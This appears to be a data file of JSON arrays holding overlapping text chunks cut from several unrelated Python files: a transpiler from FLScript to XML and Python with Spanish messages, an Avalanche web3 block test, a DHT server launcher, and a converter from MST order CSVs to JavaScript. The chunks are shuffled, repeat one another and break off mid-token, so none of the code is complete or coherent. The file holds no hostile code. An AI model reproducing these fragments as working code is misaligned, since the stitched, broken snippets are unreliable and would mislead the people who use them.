"tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject):",
"tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\"",
"self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"]",
"return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname):",
"self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype",
"\".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if",
"{} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self,",
"# str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\",",
"get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj:",
"subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype,",
"vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value",
"it\") (options, args) = parser.parse_args(argv) return (options, args) def main(): options, args =",
"value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value",
"options.full = False options.toxml = True if options.verbose: print(\"Pass 1 - Parse and",
"parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is None:",
"False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other",
"= value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value))",
"== 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags",
"end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname):",
"(repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se",
"True # ----------------- def create_xml(tagname): classobj = None for cls in xml_class_types: if",
"\"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject):",
"Si no se quiere guardar resultado, no hace falta calcular mas continue tree_data",
"if ast is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue",
"mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error",
"Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname): return tagname",
"DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if",
"def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname = tagname",
"\".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not",
"in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x +",
"al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se",
"= False if fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\",",
"= True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject):",
"flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir fichero %-35s \\n\"",
"= ['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype)",
"Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3",
"def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] =",
"class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if",
"set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class",
".pytnyzer import pythonize import io if options.cache: args = [x for x in",
"self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if",
"if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))]",
"argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname",
"= [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory,",
"True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg = 0 def",
"flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:]))",
"def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object):",
"True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other",
"= sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname +",
"class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags",
"vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is",
"= \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname",
"[\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class",
"= [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class",
"if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0",
"self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags =",
"class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self,",
"= 0 def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype)",
"= open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module =",
"print(options, args) if options.full: execpython = options.exec_python options.exec_python = False options.full = False",
"return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0",
"%-35s . . . . (%.1f%%) \" % (bname, 100.0 * (nf +",
"\".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for",
"= parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else:",
"+ \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf,",
"tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return",
"= os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\"",
"+ \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\"",
"in treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif",
"vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1:",
"realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe:",
"tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"]",
"TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False debug_other =",
"tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject):",
"PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\",",
"class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"]",
"add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): #",
"+ \":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" %",
"from .pytnyzer import pythonize import io if options.cache: args = [x for x",
"bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x for",
"(\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x for x in",
". . .\") try: execute(options, [arg + \".xml\" for arg in args]) except",
"Parse and write XML file . . .\") try: execute(options, args) except Exception:",
"= [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def"
]
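The driver above hinges on one pattern: the TagObjectFactory metaclass appends every TagObject subclass to xml_class_types as it is defined, and create_xml scans that list for the first class whose tags claim the tag (which is why Unknown, matching everything, must stay last). A minimal, self-contained sketch of that auto-registration pattern, with illustrative names rather than the transpiler's own:

registry = []

class AutoRegister(type):
    def __init__(cls, name, bases, dct):
        registry.append(cls)  # every subclass registers itself at definition time
        super().__init__(name, bases, dct)

class Node(metaclass=AutoRegister):
    tags = []

    @classmethod
    def can_process_tag(cls, tagname):
        return tagname in cls.tags

class Identifier(Node):
    tags = ["identifier", "optid"]

def create_node(tagname):
    # the first registered class that claims the tag wins
    for cls in registry:
        if cls.can_process_tag(tagname):
            return cls()
    return None

print(type(create_node("identifier")).__name__)  # -> Identifier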
[
"src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test()",
"<gh_stars>0 from src.common.config import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint",
"test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\")) # EXECUTE",
"= AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\"))",
"import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() ->",
"-> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\")) # EXECUTE test()",
"src.common.config import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug",
"TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\")",
"# VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>>",
"from src.common.config import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from",
"AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client =",
"pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS",
"pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None:",
"import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST",
"AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>>",
"pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) #",
"nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict",
"from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri)",
"import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client",
"from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict #",
"VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST",
"# TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING",
"src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS",
"FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\"))",
"client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\")",
"from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def",
"def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\")) #",
"import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import"
]
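The test above goes through the project's AvalancheCWeb3Client wrapper, but the two get_block calls are plain web3.py underneath. A hedged sketch against a public Avalanche C-Chain RPC endpoint (the URI is an assumption here, not the project's nodeUri from src.common.config):

from web3 import Web3

# Assumed public Avalanche C-Chain endpoint; the project reads its own
# nodeUri from src.common.config instead.
node_uri = "https://api.avax.network/ext/bc/C/rpc"
w3 = Web3(Web3.HTTPProvider(node_uri))

latest = w3.eth.get_block("latest")
print(latest["number"], latest["hash"].hex())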
[
"action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to",
"-- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node')",
"hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost',",
"of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store',",
"ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name",
"to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args",
"'--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port",
"import ArgumentParser from dht.server import app if __name__ == '__main__': parser = ArgumentParser(",
"from argparse import ArgumentParser from dht.server import app if __name__ == '__main__': parser",
"python from argparse import ArgumentParser from dht.server import app if __name__ == '__main__':",
"argparse import ArgumentParser from dht.server import app if __name__ == '__main__': parser =",
"if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash",
"'--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind",
"'--port', action='store', type=int, required=True, help='port to bind to') args = parser.parse_args() app.run(host=args.host, port=args.port)",
"dht.server import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A",
"to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args = parser.parse_args()",
"parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to",
"bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args =",
"'__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name',",
"help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to')",
"app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed",
"ArgumentParser from dht.server import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT",
"= ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True,",
"description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of",
"node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int,",
"simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host',",
"help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port',",
"#!/usr/bin/env python from argparse import ArgumentParser from dht.server import app if __name__ ==",
"from dht.server import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT --",
"== '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n',",
"__name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table')",
"import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple",
"parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store',",
"required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p',",
"action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to')",
"distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store',",
"default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind",
"parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args = parser.parse_args() app.run(host=args.host,",
"parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True,",
"A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k',",
"table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname"
]
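Nothing in the launcher says what dht.server.app is beyond exposing run(host=..., port=...); assuming a Flask-style app, a node would be started as e.g. `python run_node.py -n node1 -p 5000`. A runnable stand-in with a stub app (the route and names are placeholders, not part of PiplineDHT):

from argparse import ArgumentParser
from flask import Flask

app = Flask(__name__)  # stub standing in for dht.server.app

@app.route("/ping")
def ping():
    return "pong"

if __name__ == '__main__':
    parser = ArgumentParser(description='stub node launcher')
    parser.add_argument('-n', '--name', action='store', required=True,
                        help='name of node')
    parser.add_argument('-p', '--port', action='store', type=int, required=True,
                        help='port to bind to')
    args = parser.parse_args()
    app.run(host='localhost', port=args.port)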
[
"else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write('",
"We've been using some online order files in our original PsychoPy-derived web-based MST.",
"open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if",
"if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else:",
"corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n')",
"order files in our original PsychoPy-derived web-based MST. This converts those actual .csv",
"'{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1):",
"fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for",
"trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) +",
"'}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in",
"testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',')",
"online order files in our original PsychoPy-derived web-based MST. This converts those actual",
"stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0])",
"fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile:",
"'{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i",
"in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3},",
".js ones we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark",
"actual .csv files into the .js ones we'll be using here \"\"\" import",
"row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i",
"in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)):",
"Wed Apr 1 17:05:31 2020 @author: craig We've been using some online order",
"+ \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}')",
"\"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if",
"1 17:05:31 2020 @author: craig We've been using some online order files in",
"of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[]",
"some online order files in our original PsychoPy-derived web-based MST. This converts those",
"infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim:",
"Apr 1 17:05:31 2020 @author: craig We've been using some online order files",
"elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath)",
"for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader)",
"17:05:31 2020 @author: craig We've been using some online order files in our",
"range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i <",
"infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0')",
"into the .js ones we'll be using here \"\"\" import os, csv, glob",
"in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row",
"infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var",
"here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of",
"import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California -",
"reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n')",
"outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i])",
"in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',')",
"range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2:",
"using some online order files in our original PsychoPy-derived web-based MST. This converts",
"cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1])",
"glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\"))",
"for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as",
"corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close()",
"for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2},",
"outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with",
"coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig",
"This converts those actual .csv files into the .js ones we'll be using",
"corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {'",
"lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2')",
"files into the .js ones we'll be using here \"\"\" import os, csv,",
"studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in",
"< (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[]",
"corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in",
"Created on Wed Apr 1 17:05:31 2020 @author: craig We've been using some",
"- University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname)",
"open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath)",
"utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig We've",
"elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for",
"we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive",
"the .js ones we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared",
"studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile:",
"outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i])",
